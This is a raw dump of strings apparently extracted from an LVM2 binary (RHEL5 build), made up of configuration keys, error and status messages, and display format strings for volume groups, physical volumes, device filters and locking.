%sglobal/si_unit_consistencydevices/scandevices/loopfilesdevices/sysfs_scandevices/filterdevices/typesdevices/cache_dirdevices/cache_file_prefix%s%s%s/%s.cachedevices/cache%s/%s/%s.cachedevices/write_cache_stateinit_segtypeglobal/format_librariesinit_formatglobal/formatglobal/segment_librariessegment typeinit_multiple_segtypesReloading config filessetlocale failedLVM_SYSTEM_DIRuname_init_hostnamecommandbackup/archivebackup/retain_daysbackup/retain_minbackup/archive_dirarchive_init failed.backup/backupbackup/backup_dirbackup_init failed.Duplicate segment type %s: unloading shared library %s_set_tag: str_list_add %s failedInvalid tag in config file: %sInvalid hostname string for tag %sLVM_SYSTEM_DIR or tag was too longconfig_tree_list allocation failedDevice directory given in config file too longWARNING: proc dir %s not found - some checks will be bypassedNo proc filesystem found: skipping sysfs detectionFailed to create /proc/mounts string for sysfs detectionFailed to find sysfs mount pointInvalid readahead specificationactivation/missing_stripe_fillerWARNING: activation/missing_stripe_filler = "%s" is invalid,Falling back to "error" missing_stripe_filler.WARNING: activation/missing_stripe_filler = "%s" is not a block device.Failed to add /dev to internal device cachedevice/scan not in config file: Defaulting to /devInvalid string in config file: devices/scanFailed to add %s to internal device cacheInvalid string in config file: devices/loopfilesFailed to add loopfile %s to internal device cachedevices/filter not found in config file: no regex filter installedFailed to create regex device filterFailed to create lvm type filterdevices/md_component_detectiondevices/ignore_suspended_devicesPersistent cache filename too long.Failed to create persistent device filterFailed to load existing device cache from %sShared library %s does not contain segment type functionsInvalid string in config file: global/format_librariesShared library %s does not contain format functions_init_formats: Default format (%s) not foundInvalid string in config file: global/segment_librariesWARNING: Shared lib %s has conflicting init fns. Using init_multiple_segtypes().init_multiple_segtypes() failed: Unloading shared library %sFailed to allocate command contextLVM_SYSTEM_DIR environment variable is too long.Failed to create LVM2 system dir for metadata backups, config files and internal cache.Set environment variable LVM_SYSTEM_DIR to alternative location or empty string.Library memory pool creation failed_init_hostname: dm_pool_strdup failed_init_hostname: dm_pool_strdup kernel_vsn failedCommand memory pool creation failedCouldn't create default archive path '%s/%s'.Couldn't create default backup path '%s/%s'.(root)config/config.cSetting %s to %fSetting %s to %lldSetting %s to %s[]%s}=stdoutconfig_lineDumping configuration to %sFailure while writing to %smmap%s: Checksum errormunmap%s is not a regular file%s is emptyofffalsetrueWARNING: Ignoring duplicate config node: %s (seeking %s)%s not found in config: defaulting to %f%s not found in config: defaulting to %lld%s not found in config: defaulting to %sdm_pool_begin_object failed for config linevsnprintf failed for config linedm_pool_grow_object failed for config line_write_value: Unknown value type: %dConfiguration node %s not foundConfig file %s has disappeared!Failed to reload configuration filesConfiguration file %s is not a regular fileDetected config file change to %sParse error at byte %td (line %d): unexpected tokenParse error at byte %td (line %d): expected a valueFailed to allocate config pool.Failed to allocate config tree.Failed to allocate config tree parser.Failed to set overridden configuration entries.e[KZKZKZKZ[KZKZKZZ%\ZZKZZZZZZZZZZZKZKZKZ[KZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZ%[KZ5[KZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZKZE[KZU[datastruct/btree.cstr_list allocation faileddatastruct/str_list.cunknown devicedevice/dev-cache.c%s: New preferred namedev_cachedevices/preferred_namespreferred device name matcherfilename strdup failed%s: Already in device cachelstat%s: Added to device cache (preferred name)%s: Not a block device%s: Not a regular filedev_iter allocation failedIgnoring %s: %sIgnoring %s: Not a directorydir_list allocation failedDevice '%s' has been left open.Couldn't create binary tree for dev-cache.devices/preferred_names not found in config file: using built-in preferencespreferred_names patterns must be enclosed in quotesFailed to allocate preferred device name pattern list.Failed to allocate a preferred device name pattern.Preferred device name pattern matcher creation failed.struct device allocation failedstruct str_list allocation failedCouldn't insert device into binary tree.%s: Aliased to %s in device cache%sCouldn't add alias to dev cache.Couldn't add name to hash in dev cache.%s: Symbolic link to directoryIgnoring %s: Not a regular filedir_list allocation failed for filePath %s no longer valid for device(%d,%d)Aborting - please provide new pathname for what used to be %sAttempt to read an unopened device (%s).%s: %s failed after %llu of %llu at %llu: %sAttempt to close device '%s' which is not open.%s: Immediate close attempt while still referencedWARNING: %s already opened read-onlyWARNING: dev_open(%s) called while suspended%s: fstat failed: Has device name changed?Wiping %s at sector %llu length %zu sectorsdevice/dev-io.cRead size too large: %llu%s: lseek %llu failed: %sClosed %s%s: size is %llu sectorsioctl BLKGETSIZE64%s: stat failed%s: device changed%s: Not using O_DIRECT O_EXCLRWROOpened %s %s%s%sioctl BLKRAGET%s: read_ahead is %u sectorsioctl BLKBSZGET%s: block size is %u bytesWiping %s at %llu length %zuRead from %s failedCircular read from %s failed%s/dev/block/%d:%d/md/%sdm_snprintf md %s faileddevice/dev-md.c%s/block/md%d/md/%sdm_snprintf old md %s failedfopenfgetschunk_sizeDevice %s %s is %lu bytes.raid%dDevice %s %s is raid%d.raid_disksDevice %s %s is %d.%s sysfs attr %s not in expected format: %sDevice %s has an unknown md raid level: %dDevice %s stripe-width is %lu bytes.aaaaadevice/dev-swap.cSWAP-SPACESWAPSPACE2S1SUSPENDS2SUSPENDULSUSPENDV device/device.c%s/dev/block/%d:%d/partitiondm_snprintf partition failedreadlink%s/block/%s/devdm_snprintf dev failedsysfs file %s does not exist%s/dev/block/%d:%d/%sprimary dm_snprintf %s failedqueue/optimal_io_sizequeue/minimum_io_sizealignment_offsetsysfs file %s not in expected MAJ:MIN format: %ssysfs file %s not in expected format: %sdisplay/display.c--- Segments ---Logical extent %u to %u: Type %s--- Physical Segments ---Physical extent %u to %u: Logical volume %s%s/%s Logical extents %d to %d FREEr/wMissing%sPhysical volume %s%sPhysical extents %d to %d%sLogical volume %s%sLogical extents %d to %d%sUnassigned areaPV Name %s PV UUID %sNOT Total PE / Free PE %u / %u0%s%.*f%s--- Volume group ---VG Name %sSystem ID %sFormat %sMetadata Areas %dMetadata Sequence No %dread/writeexported/Clustered yesShared %sMAX LV %uCur LV %uOpen LV %uMax PV %uCur PV %uAct PV %uVG Size %sPE Size %sTotal PE %uAlloc PE / Size %u / %sFree PE / Size %u / %sVG UUID %s--- Logical volume ---VG Name %sLV UUID %sread onlyLV Write Access %sactiveINACTIVE# open %uLV Size %sCurrent LE %uCOW-table size %sCOW-table LE %uSnapshot chunk size %sMirrored volumes %uSegments %uAllocation %sRead ahead sectors autoRead ahead sectors 0Read ahead sectors %u- currently set to %uPersistent major %dPersistent minor %dBlock device %d:%dNEW --- %sPhysical volume ---PV Name %s (exported)VG Name %s%sPV Size %s(but full)Allocatable yes %sAllocatable NOPE Size (KByte) %uFree PE %uAllocated PE %unext free Exabyte EB Petabyte PB Terabyte TB Gigabyte GB Megabyte MB Kilobyte Exbibyte EiB Pebibyte PiB Tebibyte TiB Gibibyte GiB Mebibyte MiB Kibibyte KiB kB Byte B Units UnU Sectors Se%s:%s:%d:-1:%u:%u:%u:-1:%u:%u:%u:%llu:%u:%u:%u:%u:%sPV Status %sallocatable%s:%s:%llu:-1:%u:%u:-1:%u:%u:%u:%u:%s%s%s/%s:%s:%d:%d:-1:%d:%llu:%d:-1:%d:%d:%d:%dno memory for size display buffer"%s" %-9s [%-9s used / %s free]VG Access %s%s%s%sVG Status %s%sresizableLV Name %s%s/%sLV snapshot status source of %s%s/%s [%s]LV snapshot status %s destination for %s%s/%sLV Status suspendedLV Status %savailableAllocated to snapshot %.2f%% LV type Mirror undergoing conversionPV Size %s / not usable %sUnrecognised allocation policy %s_xKxl`TK?contiguousclingnormalanywhereinheriterror/errseg.cInitialised segtype: %serroerror module string list allocation failedunknown/unknown.cimporting unknown segmentstart_extentextent_countfilters/filter-composite.cUsing %scomposite filters allocation failedcompsoite filters allocation failedfilters/filter-persistent.c%s: Skipping (cached)%s: stat failed: %sfstat%s.tmppersistent_filter_cache { , valid_devices %s=[ "%s" ] } %s: rename to %s failed: %sCouldn't create hash table for persistent filter.Wiping cache of LVM-capable devicespersistent_filter_cache/valid_devicesCouldn't find %s array in '%s'Devices array contains a value which is not a string ... ignoringCouldn't add '%s' to filter ... ignoringLoaded persistent filter cache from %sInternal persistent device cache empty - not writing to %sDevice cache incomplete - not writing to %sDumping persistent device cache to %s# This file is automatically maintained by lvm. filter regexfilters/filter-regex.cfilter dm_regexinvalid filter pattern%s: Skipping (regex)filter patterns must be enclosed in quotespattern must begin with 'a' or 'r'invalid separator at end of regexNo proc filesystem found: skipping sysfs filtersysfs path name too long: %s in %ssysfs device file not correct formatfilters/filter-sysfs.csubsystem/block/devicesclass/blocksysfs pool creation failedsysfs dev_set creation failedopendir..Empty sysfs device file: %s%u:%uclosedir%s: Skipping (sysfs)filters/filter-md.cmd filter allocation failed%s: Skipping md component device%s: Skipping: error in md component detectionDRBDfilters/filter.c%s/devicesmdblkextdrbddevice-mapper%s: Skipping: open failedidemdploopdasddac960idaccissubdataraidemcpowerpower2i2o_blockiseries/vdgnbdramdiskaoexvdvdiskps3diskvirtblkmmcLVM type filter allocation failedNo proc filesystem found: using all block device typesFailed to create /proc/devices stringExpecting string in devices/types in config fileMax partition count missing for %s in devices/types in config fileZero partition count invalid for %s in devices/types in config file%s: Skipping: Unrecognised LVM device type %llu%s: Skipping: Suspended dm device%s: Skipping: dev_get_size failed%s: Skipping: Too small to hold a PV%s: Skipping: Partition table signature foundformat_text/archive.cFile: %sUnable to read archive file.VG name: %sDescription: %sBackup Time: %sArchive file %s not found.No archives found in %s.%s/%s_%05u.vgArchive file name too long.Archive rename failed for %sExpiring archive %sunlinkCouldn't create text instance object.Couldn't scan the archive directory (%s).Couldn't create new archive file.Couldn't create temporary archive name.Couldn't create FILE object for archive.Creating volume group backup "%s" (seqno %u).Couldn't create backup object.Couldn't create text format object.Failed to allocate format instancePV %s is a different format (seqno %s)Format-specific setup for %s failedCannot restore Volume Group %s with %i PVs marked as missing.Failed to generate backup filename (for restore).Failed to generate backup filename (for removal).WARNING: This metadata update is NOT backed upTest mode: Skipping volume group backup.Failed to generate volume group metadata backup filename.Backup of volume group %s metadata failed.Couldn't copy backup directory name.Couldn't copy archive directory name.Test mode: Skipping archiving of volume group.Archiving volume group "%s" metadata (seqno %u).Volume group "%s" metadata archive failed.Failed to generate backup filename.format_text/archiver.cPV %s missing from cache*before**after*Created %s executing '%s'backup_params alloc failedarchive_params alloc failedInternal error tracking indentation# Generated by LVM2 version %s: %scontents = "Text Format Volume Group"creation_host = "%s" # %s %s %s %s %stext_export buffer allocation failedDoubling metadata output buffer to %uformat_text/export.cuname failed: %s%ss = [,"%s", %u%sstatus = %sflags = %s# Hint onlyKilobytes# %g %s%s {tags = %sallocation_policy = "%s"read_ahead = -1# Noneread_ahead = %umajor = %dminor = %dsegment_count = %usegment%u {start_extent = %uextent_count = %utype = "%s"physical_volumes {device = "%s"dev_size = %llupe_start = %llupe_count = %u2.02.56(1)-RHEL5 (2010-02-08)version = %ddescription = "%s"creation_time = %lu # %stext pv_namespv%dseqno = %usystem_id = "%s"extent_size = %umax_lv = %umax_pv = %ulogical_volumes {Buffer reallocation failed.MegabytesGigabytesTerabytesPetabytesExabytes?D:Unknown flag set requested.format_text/flags.cStatus value is not a string.PARTIALUnknown status flag '%s'.EXPORTEDRESIZEABLEPVMOVEREADWRITECLUSTEREDSHAREDALLOCATABLEMISSINGFIXED_MINORVISIBLELOCKEDNOTSYNCEDMetadata inconsistency: Not all flags successfully exported.Extent size must be power of 2struct mda_header allocation failedIncorrect metadata area header checksumWrong magic number in metadata area headerIncompatible metadata area header version: %dIncorrect start sector in metadata area header: %lluFound text metadata area: offset=%llu, size=%lluFound LVM2 metadata record at offset=%llu, size=%zu, offset2=%llu size2=%zuFailed to write metadata area header%sCommitting %s metadata (%u) to %s header at %lluWiping pre-committed %s metadata from %s header at %lluVG %s metadata too large for circular bufferWriting %s metadata to %s at %llu len %lluWriting metadata to %s at %llu len %lluRead %s %smetadata (%u) from %s at %llu size %lluTest mode: Skipping committing %s metadata (%u)Text format failed to determine directory.Couldn't create temporary text file name.Failed to write metadata to %s.'%s' does not contain volume group '%s'.Random lvid creation failed for %s/%s.Creating metadata area on %s at sector %llu size %llu sectors%s: setting pe_start=%llu (orig_pe_start=%llu, pe_align=%lu, pe_align_offset=%lu, adjustment=%llu)Data area is beyond end of device %s!Couldn't create text label handler.Couldn't register text label handler.Invalid string in config file: metadata/dirsAdding text format metadata dir: %sFailed to add %s to text format metadata directory list Empty metadata disk_area section of config fileMissing start_sector in metadata disk_area section of config fileMissing size in metadata disk_area section of config fileMissing uuid in metadata disk_area section of config fileInvalid uuid in metadata disk_area section of config file: %sCouldn't find device with uuid '%s'.%s: Volume group filename may not end in .tmpCouldn't allocate text format context object.Couldn't allocate format instance object.Couldn't allocate text_fid_context.%s: metadata too large for circular buffer%s: Found metadata at %llu size %llu (in area at %llu size %llu) for %s (%s)Must be exactly one data area (found %d) on PV %smetadata_area allocation failedPV %s too large for extent size %s.WARNING: %s: Overriding data alignment to %lu sectors (requested %lu sectors)WARNING: %s: Overriding data alignment offset to %lu sectors (requested %lu sectors)%s: pe_align (%lu sectors) must not be less than pe_align_offset (%lu sectors)Physical extents end beyond end of device %s!WARNING: metadata area fills disk leaving no space for data on %s.Insufficient space for first mda on %sFailed to wipe new metadata areaformat_text/format-text.c LVM2 x[5A%r0N*>Pre-VG %s metadata writing failedVG %s not found on %spre-commit Unlinking %sCommitting %s metadata (%u)Renaming %s to %sTest mode: Skipping renamefdopenWriting %s metadata to %sfsyncRead volume group %s from %stextFailed to allocate dir_listmetadata/dirs_add_dir allocation failedmetadata/disk_areasstart_sectorCouldn't find device._add_raw allocation failedInitialised format: %sName too long %s/%sdevices/data_alignmentformat_text/import.cCouldn't read volume group metadata.Can't process text format file - %s.Couldn't find volume group in file.Couldn't read uuid for volume group %s.Couldn't find status flags for volume group %s.Couldn't read 'seqno' for volume group %s.Error reading flags of volume group %s.Couldn't read extent size for volume group %s.Couldn't read 'max_lv' for volume group %s.Couldn't read 'max_pv' for volume group %s.allocation_policy must be a string.Couldn't find all physical volumes for volume group %s.Couldn't read tags for volume group %s.Couldn't read all logical volume names for volume group %s.Couldn't read all logical volumes for volume group %s.Failed to fixup mirror pointers after import for volume group %s.Lost logical volume reference %sCouldn't read uuid for logical volume %s.Couldn't read 'start_extent' for segment '%s' of logical volume %s.Couldn't read 'extent_count' for segment '%s' of logical volume %s.Segment type must be a string.Couldn't read tags for a segment of %s/%s.Only one segment permitted for snapshotCouldn't read segment count for logical volume %s.segment_count and actual number of segments disagree for logical volume %s.Couldn't read minor number for logical volume %s.Couldn't read major number for logical volume %s.Couldn't read status flags for logical volume %s.Couldn't read tags for logical volume %s/%s.Zero areas not allowed for segment %sBad volume name in areas array for segment %s.Missing offset in areas array for segment %s.Bad offset in areas array for segment %s.Couldn't find volume '%s' for segment '%s'.Incorrect number of areas in area array for segment '%s'.Couldn't read uuid for physical volume.Couldn't read status flags for physical volume.Couldn't read extent size for physical volume.Couldn't find extent count (pe_count) for physical volume.Couldn't read tags for physical volume %s in %s.Fixing up missing size (%s) for PV %sWARNING: Physical Volume %s is too large for underlying deviceformat_text/import_vsn1.cCouldn't find section '%s'.Couldn't find uuid.uuid must be a string.Invalid uuid.statusCould not find status flags.Could not read status flags.flagsCould not read flags.creation_hostdescriptioncreation_timelvm2 vg_readsystem_idsystem_id must be a stringseqnoextent_sizemax_lvmax_pvallocation_policyCouldn't create hash table.physical_volumeslogical_volumesEmpty logical volume section.Empty segment section.stripedSegment allocation failed_mimagetmpsegment_countread_aheadcontentsmissing contents fieldText Format Volume Groupunrecognised contents fieldmissing version numberunrecognised version numberNULLEmpty pv section.dev_sizepe_start%s: Couldn't get size.Found a tag that is not a stringformat_text/tags.cLVM2 001format_text/text_label.c mda2 (s, mda1 ( da1 (Couldn't allocate labeller object.struct mda_list allocation failedstruct mda_context allocation failedstruct data_area_list allocation failed%s: Preparing PV label header %s size %llu with%s%.*llu%s%.*llu%s%s%.*llu%s%.*llu%s%s%.*llu%s%.*llu%sInternal error: %s label header currently requires a data area.freeseg/freeseg.clabel/label.clabel allocaction failed%s: Failed to read label areaLABELONE%s: %s label detected%s: No label detectedUsing cached label for %sFailed to write label to %sIgnoring additional label on %s at sector %llu%s: Label for sector %llu found at sector %llu - ignoringLabel checksum incorrect on %s - ignoringLabel handler does not support label writesLabel sector %llu beyond range (%ld)%s: Writing label to sector %llu with stored offset %u.Scanning for labels to wipe from %s%s: Wiping label at sector %lluFailed to remove label from %s at sector %lluCouldn't allocate memory for labeller list object./var/lock/lvmglobal/locking_dirglobal/prioritise_write_lockssigfillsetinit_file_lockinglocking/file_locking.csigdelset_undo_flock %sUnlocking %sflocksignal_remove_ctrl_c_handler_do_flock %s %c%c%s/P_%s%s/V_%sUnrecognised lock type: %dLocking %s %c%cUnlocking LV %sLocking LV %s (NL)Locking LV %s (R)Locking LV %s (PR) - ignoredLocking LV %s (W)Locking LV %s (EX)Unrecognised lock scope: %d6C7 577A88CTRL-c detected: giving up waiting for locklocking/locking.csigprocmask_block_signals2.4.%s/lvm/VGs/%sFailed to activate %sFailed to suspend %sglobal/locking_typeglobal/wait_for_locksNon-blocking External locking selected.Cluster locking selected.Internal error: Use of P_orphans is deprecated.Internal error: P_%s referencedLVM1 proc VG pathname too long for %s%s exists: Is the original LVM driver using this volume group?Internal error: %s: LCK_NONE lock requestedWARNING: Locking disabled. Be careful! This could corrupt your metadata.%sFile-based locking selected.global/fallback_to_clustered_lockinglocking/fallback_to_clustered_lockingFalling back to internal clustered locking.Read-only locking selected. Only read operations permitted.Unknown locking type requested.global/fallback_to_local_lockinglocking/fallback_to_local_lockingWARNING: Falling back to local file-based locking.Volume Groups with the clustered attribute will be inaccessible.Locking disabled - only read operations permitted.GxIUHGJG_lock_vollocking/no_locking.cSMaM0M0MwMMMWrite locks are prohibited with --ignorelockingfailure.activate_log filefailed to write log file: %s failed to write log file #%s:%d %s:%d %s%slog/log.cvsnprintf failed: skipping external logging function`WW0XfYXName allocation failed - device not clearedName too long - device not cleared (%s)Clearing start of logical volume "%s"%s: not found: device not clearedFailed to find segment for %s extent %uLV %s in VG %s is now visible.%s:%u is no longer a user of %sparallel_areas allocation failedIncompatible layer boundary: %s:%u[%u] on %s:%ulayer segment for %s:%u not foundUnable to allocate logical volume structureFailed to allocate segment listMaximum number of logical volumes (%u) reached in volume group %sFailed to generate unique name for the new logical volumeUnable to create LV %s in Volume Group %s: name already in use.Cannot rename internal LV "%s".Logical volume "%s" already exists in volume group "%s"Failed to allocate space for new nameWriting out updated volume groupCannot rename "%s": name format not recognized for internal LV "%s"allocate_extents does not handle virtual segmentsMetadata format (%s) does not support required LV segment type (%s).Consider changing the metadata format by running vgconvert.Striped mirrors are not supported yetCan't mix striping with a mirror log yet.allocation handle allocation failedallocation pool creation failed_allocate called with no work to do!Parallel PVs at LE %u length %u: %sNot enough PVs with free space available for parallel allocation.Consider --alloc anywhere if desperate.Couldn't allocate areas array.Insufficient free space: %u extents needed, but only %u availablealloced_area allocation failedInsufficient suitable %sallocatable extents for logical volume %s: %u more requiredInsufficient extents for log allocation for logical volume %s.Remove %s:%u[%u] from the top of LV %s:%uSegment extent reduction %unot divisible by #stripes %uCan't remove logical volume "%s" under snapshotCan't remove logical volume %s used by a mirrorCan't remove logical volume %s used as mirror logCan't remove open logical volume "%s"Do you really want to remove active %slogical volume %s? [y/n]: Unable to deactivate logical volume "%s"Error releasing logical volume "%s"Failed to refresh %s without snapshot.Logical volume "%s" successfully removedRemoving layer %s for segments of %sLayer status does not match: %s:%u status: 0x%x/0x%xLayer boundary mismatch: %s:%u-%u on %s:%u / %u-%u / alloc_lv_segment: Missing segtype.Inserting layer %s for segments of %s on %sMatched PE range %s:%u-%u against %s %u len %uFailed to insert segment in layer LV %s under %s:%u-%uLog segments can only be added to an empty LVCouldn't allocate new mirror log segment.Can't convert non-striped segment to mirrored.Can't convert striped segment with multiple areas to mirrored.Couldn't allocate converted LV segmentMirror layer must be inserted before adding mirrorsFailed to allocate widened LV segment for %s.Failed to split segment at %s extent %uCouldn't allocate new zero segment.layer name allocation failed. Remove new LV and retry.Creating transient LV %s for mirror conversion in VG %s.Creation of transient LV %s for mirror conversion in VG %s failed.Failed to write intermediate VG %s metadata for mirror conversion.Failed to commit intermediate VG %s metadata for mirror conversion.Failed to resume transient error LV %s for mirror conversion in VG %s.Missing segtype in lv_add_segment().lv_add_segment cannot handle virtual segmentsCouldn't allocate new LV segment.Couldn't merge segments after extending logical volume.Aborting. Failed to extend %s.Zero segment type for virtual origin not foundVirtual origin name allocation failed.Metadata does not support mirroring.Metadata only supports readahead values between 2 and 120.Reducing requested stripe size %s to maximum, physical extent size %sRounding size (%d extents) up to stripe boundary size (%d extents)Can't wipe start of new LV without using device-mapper kernel driverCan't create snapshot without using device-mapper kernel driverClustered snapshots are not yet supported.Couldn't find origin volume '%s'.Can't share virtual origins. Use --virtualsize.Snapshots of snapshots are not supported yet.Snapshots of locked devices are not supported yetSnapshots and mirrors may not yet be mixed.Check for existence of snapshot origin '%s' failed.Unable to create new logical volume with no extentsInsufficient free extents (%u) in volume group %s: %u requiredNumber of stripes (%u) must not exceed number of physical volumes (%d)Can't create mirror without using device-mapper kernel driver.Volume group %s does not support tagsWARNING: New mirror won't be synchronised. Don't read what you didn't write!Setting device number to (%d, %d)Aborting. Failed to activate snapshot exception store.Aborting. Failed to activate new LV to wipe the start of it.Aborting. Couldn't deactivate snapshot COW area. Manual intervention required.Couldn't create virtual origin for LV %sProblem reactivating origin %sUnable to deactivate failed new LV. Manual intervention required.Manual intervention may be required to remove abandoned LV(s) before retrying.Failed to find snapshot segtypeCouldn't allocate new snapshot segment.%s is expected to have only one segment using it, while it has %d%s is expected to have only one segment using it, while %s:%u uses it %d timesmetadata/lv_manip.cCan't move snapshot segmentLV %s in VG %s is now hidden.Adding %s:%u as an user of %sStack %s:%u[%u] on LV %s:%upv_list allocation failedCreating logical volume %sCannot rename locked LV %sFailed to create new namedm_pool_begin_object faileddm_pool_grow_object failedcontiguous Can't remove locked LV %sLogical volume %s not removedRemoving snapshot %sReleasing logical volume "%s"Failed to resume %s.Layer segment found: %s:%uLayer is not linear: %s:%uMissing error segtypelv_list alloc failedInserting %s:%u-%u of %s/%sanymirrorConflicting region_sizeCreation of layer LV failedInserting layer %s for %s%s_voriginStripe size may not exceed %slvol%dFailed to generate LV name.Setting read ahead sectorsFailed to add tag %s to %s/%sFailed to activate new LV.WARNING: "%s" not zeroedsnapshot exception storestart of new LVAborting. Failed to wipe %s.Couldn't create snapshot.Failed to suspend origin %sLogical volume "%s" createdRemoving layer %s for %sFailed to find layer %s in %sSegment with extent %u in LV %s not foundCouldn't allocate cloned LV segment.LV segment tags duplication failedSplit %s:%u[%u] at %u: %s LE %uSplit %s:%u[%u] at %u: %s PE %uUnassigned area %u found in segmentUnable to split the %s segment at LE %u in LV %sLV %s invalid: segment %u should begin at LE %u (found %u).LV %s: segment %u has inconsistent area_len %uLV %s: segment %u has log LV but is not mirroredLV %s: segment %u log LV %s is not a mirror logLV %s: segment %u log LV does not point back to mirror segmentLV %s: segment %u mirror image is not mirroredLV %s: segment %u has same LV %s for both origin and snapshotLV %s: segment %u has unassigned area %u.LV %s: segment %u has inconsistent PV area %uLV %s: segment %u has inconsistent LV area %uLV %s: segment %u mirror image %u missing mirror ptrLV %s segment %d uses LV %s, but missing ptr from %s to %sLV %s has duplicated links to LV %s segment %dLV %s is used by LV %s:%u-%u, but missing ptr from %s to %sReference count mismatch: LV %s has %d links to LV %s:%u-%u, which has %d linksLV %s: inconsistent LE count %u != %uLV segment %s:%u-%uis incorrectly listed as being used by LV %smetadata/merge.c#metadata/metadata.cpv allocation for '%s' failed free space allocated space PV segment start PV segment length area length extents moved pvseg start pvseg length area startVolume group %s is exportedVolume group %s is read-onlylvm2 vg_handleError allocating vg handle.vg_read orphanvg allocation failedvg name allocation failedFound volume group "%s"Volume group "%s" is exportedCan't get lock for %sVolume group "%s" not foundPV list allocation failedget_pvs: get_vgids failedPhysical volume %s not foundMaxLogicalVolume limit is 255Can't get lock for orphan PVsWiping swap signature on %s of volume group "Zeroing start of device %s%s not wiped: abortingInvalid vg name %slvm2 vg_createvg_remove_mdas %s faileddevices/md_chunk_alignmentAttempt to modify a read-only VGFormat does not support writing physical volumesAssertion failed: can't _pv_write non-orphan PV (in VG %s)Calculated readahead of LV %s is %uVolume Group allocation policy cannot inherit from anythingVolume group "%s" must be resizeable to change MaxPhysicalVolumesMaxPhysicalVolume limit is 255MaxPhysicalVolumes is less than the current number %d of PVs for "%s"New size %llu for %s%s not an exact number of new extents.New extent count %llu for %s%s exceeds 32 bits.Device %s not found (or ignored by filtering).Could not find LVM label on %sFound label on %s, sector %llu, type=%sNo physical volume label read from %sFailed to read existing physical volume '%s'Volume group "%s" must be resizeable to change PE sizePhysical extent size may not be zeroPhysical extent size must be a power of 2.New extent size is not a perfect fitAttempt to drop cached metadata failed after reverted update for VG %s.Skipping clustered volume group %sVolume group %s is not resizeable.Internal error: global memory pool used for VG %sFailed to clear metadata from physical volume "%s" after removal from "%s"vg->name allocation failed for '%s'pv->vg_name allocation failed for '%s'pv_list allocation for '%s' failedInternal error: Attempt to write new VG metadata without locking %sAttempt to drop cached metadata failed after commit for VG %s.Volume group %s contains snapshots that are not yet supported.Internal error: Duplicate PV id %s detected for %s in %s.Internal error: VG name for PV %s is corruptedInternal error: PV segments corrupted in %s.Internal error: #internal LVs (%u) != #LVs (%u) + #snapshots (%u) + #internal LVs %u in VG %sInternal error: Duplicate LV name %s detected in %s.Internal error: Duplicate LV id %s detected for %s and %s in %s.Internal error: LV segments corrupted in %s.Internal error: Volume group %s has limited PV/LV count but limit is not set.Cannot update partial volume group %s.Cannot update volume group %s while physical volumes are missing.Cannot update volume group %s with unknown segments in it!Aborting vg_write: No metadata areas to write to!Unable to drop cached metadata for VG %s.Format does not support writing volumegroup metadata areasInternal error: vg_read_internal requires vgname with pre-commit.Failed to create format instanceThere are %d physical volumes missing.Cached VG %s had incorrect PV listInconsistent pre-commit metadata copies for volume group %sInconsistent metadata UUIDs found for volume group %sWARNING: Inconsistent metadata found for VG %s - updating to use version %uMissing device %s reappeared, updating metadata for VG %s to version %u.Device still marked missing because of alocated data on it, remove volumes and consider vgreduce --removemissing.Automatic metadata correction failedAutomatic metadata correction commit failedRemoving PV %s (%s) that no longer belongs to VG %sWARNING: Interrupted pvmove detected in volume group %sPlease restore the metadata by running vgcfgrestore.Updating cache for PVs without mdas in VG %s.Finding volume group for uuid %sVolume group %s metadata is inconsistentvg_read_by_vgid: get_vgnames failedVolume group for uuid not found: %sCan't find logical volume id %sVolume group name %s has invalid charactersVolume group "%s" inconsistent.Recovery of volume group "%s" failed.Cannot change VG %s while PVs are missing.Consider vgreduce --removemissing.Cannot change VG %s with unknown segments in it!WARNING: Volume Group %s is not consistentPhysical volume %s not in a volume groupget_pv_from_vg_by_id: vg_read_internal failed to read VG %sWARNING: Volume group %s is not consistentinternal PV duplication failedLogical volumes in "%s" must be inactiveExtent sizes differ: %d (%s) and %d (%s)Maximum number of physical volumes (%d) exceeded for "%s" and "%s"Maximum number of logical volumes (%d) exceeded for "%s" and "%s"Metadata types differ for "%s" and "%s"Clustered attribute differs for "%s" and "%s"Duplicate logical volume name "%s" in "%s" and "%s"Physical volume %s might be constructed from same volume group %s.Volume group "%s" must be resizeable to change MaxLogicalVolumeMaxLogicalVolume is less than the current number %d of LVs for %sFailed to create random uuid for %s.WARNING: %s: Overriding real size. You could lose data.%s: Pretending size is %llu sectors.%s: Size must exceed minimum of %ld sectors.%s: Data alignment must not exceed device size.%s: Format-specific setup of physical volume failed.uuid %s already in use on "%s"Can't initialize physical volume "%s" of volume group "%s" without -ff%s: physical volume not initializedCan't open %s exclusively. Mounted filesystem?Software RAID md superblock detected on %s. Wipe it? [y/n] Wiping software RAID md superblock on %sFailed to wipe RAID md superblock on %sFatal error while trying to detect software RAID md superblock on %sSwap signature detected on %s. Wipe it? [y/n] Failed to wipe swap signature on %sFatal error while trying to detect swap signature on %sWARNING: Forcing physical volume creation on %s%s%s%s%s: Couldn't find device. Check your filters?Failed to setup physical volume "%s"Set up physical volume for "%s" with %llu available sectorsFailed to wipe existing label on %s%s not opened: device not zeroedWriting physical volume data to disk "%s"Failed to write physical volume "%s"Physical volume "%s" successfully createdPhysical volume %s not in volume group %sLogical volume %s not in volume group %sRounding up size to full physical extent %sVolume too large (%s) for extent size %s. Upper limit is %s.%s: already exists in filesystemNew volume group name "%s" is invalidNumber of volumes may not exceed 255A volume group called '%s' already exists.Couldn't create uuid for volume group '%s'.Format specific setup of volume group '%s' failed.New volume group path exceeds maximum length of %d!Old and new volume group names must differPhysical volume %s not in volume group %s.Physical volume %s still in use.Unable to remove physical volume '%s' from volume group '%s'.Volume group "%s" not found, is inconsistent or has PVs missing.Consider vgreduce --removemissing if metadata is inconsistent.Volume group "%s" still contains %u logical volume(s)Removing physical volume "%s" from volume group "%s"Failed to remove physical volume "%s" from volume group "%s"Volume group "%s" successfully removedVolume group "%s" not properly removeddevices/data_alignment_offset_detection%s: Setting PE alignment offset to %lu sectors.devices/data_alignment_detection%s: Setting PE alignment to %lu sectors.Adding physical volume '%s' to volume group '%s'Physical volume '%s' is already in volume group '%s'Physical volume %s is of different format type (%s)Physical volume %s might be constructed from same volume group %sFormat-specific setup of physical volume '%s' failed.Physical volume '%s' listed more than once.No space for '%s' - volume group '%s' holds max %d physical volume(s).Unable to add %s to %s: new extent count (%llu) exceeds limit (%u).%s not identified as an existing physical volumeUnable to add physical volume '%s' to volume group '%s'.Really INITIALIZE physical volume "%s" of volume group "%s" [y/n]? BInvalid index (%u) of mirror image 